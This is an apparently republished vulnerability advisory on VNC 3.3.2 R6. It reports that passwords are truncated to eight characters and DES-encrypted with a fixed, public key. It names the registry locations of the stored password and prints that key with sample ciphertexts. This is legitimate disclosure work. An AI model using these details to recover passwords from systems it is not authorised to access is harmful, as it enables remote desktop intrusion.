‘VNC 3.3.2 R6 uses a weak password protection mechanism’

Summary

‘VNC is a free software package that permits users to view a remote desktop in real-time. In order to protect from intrusions, VNC is password protection. This encryption is done using DES, which is an extremely strong encryption scheme, but the way VNC does the encryption is rather poor and can be easily decrypted by anyone with read access to the registry.’

Credit:

‘The information has been provided by: Conde Vampiro.’


Details

‘The software contains two vulnerabilities:

1) Fixed password length (up to 8 characters).
2) Fixed encryption key.

1) Fixed password length.
When we install the VNC server on a Windows box, we can find the encrypted password at the following registry keys (look for ‘password’):
HKEY_CURRENT_USERSoftwareORLWinVNC3
HKEY_USERS.DEFAULTSOftwareORLWinVNC3

When we introduce a password of arbitrary length, the VNC server will encrypt our password, but it will drop (nullify) all bytes after the 8th one. This is demonstrated here:

Input password -> micasaesazul
Key -> 23 82 107 6 35 78 88 7
Encrypted password -> 1f f1 6f 1a cc 34 64 f0

Input password -> micasaesroja
Key -> 23 82 107 6 35 78 88 7
Encrypted password -> 1f f1 6f 1a cc 34 64 f0

In both cases, the VNC server interpreted the password as ‘micasaes.’ an eight characters password is usually too small.

2) Fixed encryption key.
When the VNC server encrypts a password it always uses the same fixed key, so the output password are always the same. For example, if we input ‘conde’ as password, the output password is: df 6b 7e e8 94 26 d8 b5. Since the software is open source, the key is publicly available, making the encryption pointless.

Input password -> conde
Key -> 23 82 107 6 35 78 88 7
Encrypted password -> df 6b 7e e8 94 26 d8 b5

Input password -> 2621
Key -> 23 82 107 6 35 78 88 7
Encrypted password -> 73 05 1d 22 49 b6 05 1c

The VNC server always uses this key (’23 82 107 6 35 78 88 7′) in the current version. This mean that an attacker with read access to the registry can simply decode the password and obtain the plain-text version of it.’

Categories: News